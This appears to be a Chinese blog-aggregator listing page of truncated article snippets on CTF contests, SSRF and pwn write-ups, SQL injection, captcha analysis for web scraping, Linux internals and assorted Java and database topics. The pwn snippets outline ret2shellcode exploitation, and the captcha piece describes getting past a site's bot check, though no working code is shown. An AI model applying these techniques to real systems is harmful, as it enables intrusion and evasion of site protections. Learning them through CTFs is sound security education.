01、CTF（夺旗赛）这是一种最常见的网络安全竞技形式，要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战，获取标志（flag）并提交得分。通过举办CTF来培养网络安全人才，已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛，线上赛通常是解题模式（Jeopardy），线下赛通常是攻防模式（Attack-Defense）。CTF赛事的代表性线下赛事
第四部分：1---文件内核对象，文件描述符，输出重定向 S+叮当猫 Linux CentOS 算法 linux 服务器
目录structfile内核对象：如何读写文件？文件描述符在文件描述符表中的分配规则：输出重定向初步解析：dup2实现复制文件描述符：structfile内核对象：structfile是在内核空间中创建的用于描述文件的结构体，每当一个文件被打开时，内核会为该文件创建一个对应的structfile结构体，并在文件描述符表中为其分配一个文件描述符。基于文件的定义（文件=内容+属性），structfil
网络攻防WEB入门指南 youhao108 网络攻防 web 渗透测试网络安全网络攻防
网络攻防WEB入门指南（大佬绕路）文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解，分为比赛和实战两个部分，两者所学习的知识虽有共通之处，但还是有很大区别，我也在向实战的状态转换，不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度，也就是知名的CTF夺旗赛，来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题，以及线下AWD攻防（AttackWith
软考 - 系统架构设计师 - 设计模式小林想被监督学习系统架构设计师系统架构设计模式
目录概念创建型设计模式抽象工厂模式（AbstractFactoryPattern）优点缺点应用场景总结构建器模式（BuilderPattern）优点缺点应用场景工厂方法模式（factorymethod）优点缺点应用场景原型模式（prototype）优点缺点应用场景单例模式（Singleton）优点缺点应用场景结构型设计模式适配器模式（Adapter）优点缺点应用场景桥接模式（Bridge）优点缺点
ctfshow web入门 ssrf web351~web360 kikkeve ctfshow php web安全安全
目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源，因为我们远程请求不到。curl_init()：初始curl会话curl_setopt()：会话设置curl_exec()：执行curl会话,获取
flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包 Sindyue flutter
1.build.gradle文件中配置不同的应用信息flavorDimensions"app"productFlavors{app1{//配置包名manifestPlaceholders=[str:"releaseStr",package_name:"com.example.demo1"]applicationId"com.example.demo1"versionCode1versionName
CTF 竞赛密码学方向学习路径规划 David Max CTF 学习笔记密码学 ctf 信息安全
目录计算机科学基础计算机科学概念的引入、兴趣的引导开发环境的配置与常用工具的安装WattToolkit（Steam++）、机场代理Scoop（Windows用户可选）常用Python库SageMathLinux小工具yafuOpenSSLMarkdown编程基础Python其他编程语言、算法与数据结构（可选）数学基础离散数学与抽象代数复杂性分析密码学的正式学习兴趣的培养做题小技巧系统学习需要了解并
58手势验证码的分析 allgiveup
做爬虫的小伙伴们肯定都深有体会，爬虫要是遇到验证码了基本上就是GG了。于是爬虫工作者和验证码之间必有一战。随着web安全技术的提升，验证码也一代一代的革新，并且越发的变态。小曾也去研究了各式样的验证码，最后决定拿出58手势验证码和大家分享。分析概述首先我对58手势验证码做一个总体的描述。从触发验证码到验证成功，我们操作的背后需要向服务器发送6个请求，并且还有一次js算法对参数加密。6个请求之间有着
MySQL8.0新特性~最左前缀匹配原则被打破了进击的CJR mysql mysql
测试在MySQL8.0.25和mysql5.7.33中创建如下CREATETABLEt1(f1INTNOTNULL,f2INTNOTNULL,PRIMARYKEY(f1,f2));INSERTINTOt1VALUES(1,1),(1,2),(1,3),(1,4),(1,5),(2,1),(2,2),(2,3),(2,4),(2,5);INSERTINTOt1SELECTf1,f2+5FROMt1;
web安全学习笔记（1）头发的天敌是代码 web安全学习笔记 web安全学习笔记
一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别？①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统：WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统：Windows2000Windows2003Windows2008Windows
Web安全与网络安全：SQL漏洞注入 hong161688 web安全 sql oracle
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
Web安全与网络安全：SQL漏洞注入 bigbig猩猩 typescript vue.js 前端
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
hackcon ctf 2018 | pwn wp fantasy_learner
BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点，得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出，输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久，卡在了能否根据_d
BUUCTF 2021-10-4 Pwn Ch1lkat BUUCTF Pwn linux pwn
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
C# 关于多线程同步不同实现方式語衣 C#知识补充 c#开发语言
栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva
集合框架天子之骄 java 数据结构集合框架
集合框架集合框架可以理解为一个容器，该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。从本质上来说，Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。简单介绍： Collection接口是最基本的接口，它定义了List和Set，List又定义了LinkLi
Table Driven（表驱动）方法实例 bijian1013 java enum Table Driven 表驱动
实例一： /** * 驾驶人年龄段 * 保险行业，会对驾驶人的年龄做年龄段的区分判断 * 驾驶人年龄段：01-[18,25);02-[25,30);03-[30-35);04-[35,40);05-[40,45);06-[45,50);07-[50-55);08-[55,+∞) */ public class AgePeriodTest { //if...el
Jquery 总结 cuishikuan java jquery Ajax Web jquery方法
1.$.trim方法用于移除字符串头部和尾部多余的空格。如：$.trim(' Hello ') // Hello2.$.contains方法返回一个布尔值，表示某个DOM元素（第二个参数）是否为另一个DOM元素（第一个参数）的下级元素。如：$.contains(document.documentElement, document.body); 3.$
面向对象概念的提出麦田的设计者 java 面向对象面向过程
面向对象中，一切都是由对象展开的，组织代码，封装数据。在台湾面向对象被翻译为了面向物件编程，这充分说明了，这种编程强调实体。下面就结合编程语言的发展史，聊一聊面向过程和面向对象。 c语言由贝尔实
linux网口绑定被触发 linux
刚在一台IBM Xserver服务器上装了RedHat Linux Enterprise AS 4，为了提高网络的可靠性配置双网卡绑定。一、环境描述我的RedHat Linux Enterprise AS 4安装双口的Intel千兆网卡，通过ifconfig -a命令看到eth0和eth1两张网卡。二、双网卡绑定步骤： 2.1 修改/etc/sysconfig/network
XML基础语法肆无忌惮_ xml
一、什么是XML？ XML全称是Extensible Markup Language，可扩展标记语言。很类似HTML。XML的目的是传输数据而非显示数据。XML的标签没有被预定义，你需要自行定义标签。XML被设计为具有自我描述性。是W3C的推荐标准。二、为什么学习XML？用来解决程序间数据传输的格式问题做配置文件充当小型数据库三、XML与HTM
为网页添加自己喜欢的字体知了ing 字体秒表 css
@font-face { font-family: miaobiao;//定义字体名字 font-style: normal; font-weight: 400; src: url('font/DS-DIGI-e.eot');//字体文件 } 使用： <label style="font-size:18px;font-famil
redis范围查询应用-查找IP所在城市矮蛋蛋 redis
原文地址： http://www.tuicool.com/articles/BrURbqV 需求根据IP找到对应的城市原来的解决方案 oracle表（ip_country）：查询IP对应的城市： 1.把a.b.c.d这样格式的IP转为一个数字，例如为把210.21.224.34转为3524648994 2. select city from ip_
输入两个整数，计算百分比 alleni123 java
public static String getPercent(int x, int total){ double result=(x*1.0)/(total*1.0); System.out.println(result); DecimalFormat df1=new DecimalFormat("0.0000%");
百合——————>怎么学习计算机语言百合不是茶 java 移动开发
对于一个从没有接触过计算机语言的人来说，一上来就学面向对象，就算是心里上面接受的了，灵魂我觉得也应该是跟不上的，学不好是很正常的现象，计算机语言老师讲的再多，你在课堂上面跟着老师听的再多，我觉得你应该还是学不会的，最主要的原因是你根本没有想过该怎么来学习计算机编程语言，记得大一的时候金山网络公司在湖大招聘我们学校一个才来大学几天的被金山网络录取，一个刚到大学的就能够去和
linux下tomcat开机自启动 bijian1013 tomcat
方法一：修改Tomcat/bin/startup.sh 为: export JAVA_HOME=/home/java1.6.0_27 export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/dt.jar:. export PATH=$JAVA_HOME/bin:$PATH export CATALINA_H
spring aop实例 bijian1013 java spring AOP
1.AdviceMethods.java package com.bijian.study.spring.aop.schema; public class AdviceMethods { public void preGreeting() { System.out.println("--how are you!--"); } } 2.beans.x
[Gson八]GsonBuilder序列化和反序列化选项enableComplexMapKeySerialization bit1129 serialization
enableComplexMapKeySerialization配置项的含义 Gson在序列化Map时，默认情况下，是调用Key的toString方法得到它的JSON字符串的Key，对于简单类型和字符串类型，这没有问题，但是对于复杂数据对象，如果对象没有覆写toString方法，那么默认的toString方法将得到这个对象的Hash地址。 GsonBuilder用于
【Spark九十一】Spark Streaming整合Kafka一些值得关注的问题 bit1129 Stream
包括Spark Streaming在内的实时计算数据可靠性指的是三种级别： 1. At most once，数据最多只能接受一次，有可能接收不到 2. At least once, 数据至少接受一次，有可能重复接收 3. Exactly once 数据保证被处理并且只被处理一次，具体的多读几遍http://spark.apache.org/docs/lates
shell脚本批量检测端口是否被占用脚本 ronin47
#!/bin/bash cat ports |while read line do#nc -z -w 10 $line nc -z -w 2 $line 58422>/dev/null2>&1if[ $?-eq 0]then echo $line:ok else echo $line:fail fi done 这里的ports 既可以是文件
java-2.设计包含min函数的栈 bylijinnan java
具体思路参见：http://zhedahht.blog.163.com/blog/static/25411174200712895228171/ import java.util.ArrayList; import java.util.List; public class MinStack { //maybe we can use origin array rathe
Netty源码学习-ChannelHandler bylijinnan java netty
一般来说，“有状态”的ChannelHandler不应该是“共享”的，“无状态”的ChannelHandler则可“共享” 例如ObjectEncoder是“共享”的, 但 ObjectDecoder 不是因为每一次调用decode方法时，可能数据未接收完全（incomplete），它与上一次decode时接收到的数据“累计”起来才有可能是完整的数据，是“有状态”的 p
java生成随机数 cngolon java
方法一： /** * 生成随机数 * @author [email protected] * @return */ public synchronized static String getChargeSequenceNum(String pre){ StringBuffer sequenceNum = new StringBuffer(); Date dateTime = new D
POI读写海量数据 ctrain 海量数据
import java.io.FileOutputStream; import java.io.OutputStream; import org.apache.poi.xssf.streaming.SXSSFRow; import org.apache.poi.xssf.streaming.SXSSFSheet; import org.apache.poi.xssf.streaming
mysql 日期格式化date_format详细使用 daizj mysql date_format 日期格式转换日期格式化
日期转换函数的详细使用说明 DATE_FORMAT(date,format) Formats the date value according to the format string. The following specifiers may be used in the format string. The&n
一个程序员分享8年的开发经验 dcj3sjt126com 程序员
在中国有很多人都认为IT行为是吃青春饭的，如果过了30岁就很难有机会再发展下去!其实现实并不是这样子的，在下从事.NET及JAVA方面的开发的也有8年的时间了，在这里在下想凭借自己的亲身经历，与大家一起探讨一下。明确入行的目的很多人干IT这一行都冲着“收入高”这一点的，因为只要学会一点HTML, DIV+CSS，要做一个页面开发人员并不是一件难事，而且做一个页面开发人员更容
android欢迎界面淡入淡出效果 dcj3sjt126com android
很多Android应用一开始都会有一个欢迎界面，淡入淡出效果也是用得非常多的，下面来实现一下。主要代码如下： package com.myaibang.activity; import android.app.Activity;import android.content.Intent;import android.os.Bundle;import android.os.CountDown
linux 复习笔记之常见压缩命令 eksliang tar解压 linux系统常见压缩命令 linux压缩命令 tar压缩
转载请出自出处:http://eksliang.iteye.com/blog/2109693 linux中常见压缩文件的拓展名 *.gz gzip程序压缩的文件 *.bz2 bzip程序压缩的文件 *.tar tar程序打包的数据，没有经过压缩 *.tar.gz tar程序打包后，并经过gzip程序压缩 *.tar.bz2 tar程序打包后，并经过bzip程序压缩 *.zi
Android 应用程序发送shell命令 gqdy365 android
项目中需要直接在APP中通过发送shell指令来控制lcd灯，其实按理说应该是方案公司在调好lcd灯驱动之后直接通过service送接口上来给APP，APP调用就可以控制了，这是正规流程，但我们项目的方案商用的mtk方案，方案公司又没人会改，只调好了驱动，让应用程序自己实现灯的控制，这不蛋疼嘛！！！！发就发吧！一、关于shell指令：我们知道，shell指令是Linux里面带的
java 无损读取文本文件 hw1287789687 读取文件无损读取读取文本文件 charset
java 如何无损读取文本文件呢？以下是有损的 @Deprecated public static String getFullContent(File file, String charset) { BufferedReader reader = null; if (!file.exists()) { System.out.println("getFull
Firebase 相关文章索引 justjavac firebase
Awesome Firebase 最近谷歌收购Firebase的新闻又将Firebase拉入了人们的视野，于是我做了这个 github 项目。 Firebase 是一个数据同步的云服务，不同于 Dropbox 的「文件」，Firebase 同步的是「数据」，服务对象是网站开发者，帮助他们开发具有「实时」（Real-Time）特性的应用。开发者只需引用一个 API 库文件就可以使用标准 RE
C++学习重点 lx.asymmetric C++笔记
1.c++面向对象的三个特性：封装性，继承性以及多态性。 2.标识符的命名规则：由字母和下划线开头，同时由字母、数字或下划线组成；不能与系统关键字重名。 3.c++语言常量包括整型常量、浮点型常量、布尔常量、字符型常量和字符串性常量。 4.运算符按其功能开以分为六类：算术运算符、位运算符、关系运算符、逻辑运算符、赋值运算符和条件运算符。 &n
java bean和xml相互转换 q821424508 java bean xml xml和bean转换 java bean和xml转换
这几天在做微信公众号做的过程中想找个java bean转xml的工具，找了几个用着不知道是配置不好还是怎么回事，都会有一些问题，然后脑子一热谢了一个javabean和xml的转换的工具里，自己用着还行，虽然有一些约束吧，还是贴出来记录一下顺便你提一下下，这个转换工具支持属性为集合、数组和非基本属性的对象。 packag
C 语言初级位运算 1140566087 位运算 c
第十章位运算 1、位运算对象只能是整形或字符型数据，在VC6.0中int型数据占4个字节 2、位运算符：运算符作用 ~ 按位求反 << 左移 >> 右移 & 按位与 ^ 按位异或 | 按位或他们的优先级从高到低； 3、位运算符的运算功能： a、按位取反： ~01001101 = 101
14点睛Spring4.1-脚本编程 wiselyman spring4
14.1 Scripting脚本编程脚本语言和java这类静态的语言的主要区别是:脚本语言无需编译,源码直接可运行; 如果我们经常需要修改的某些代码,每一次我们至少要进行编译,打包,重新部署的操作,步骤相当麻烦; 如果我们的应用不允许重启,这在现实的情况中也是很常见的; 在spring中使用脚本编程给上述的应用场景提供了解决方案,即动态加载bean; spring支持脚本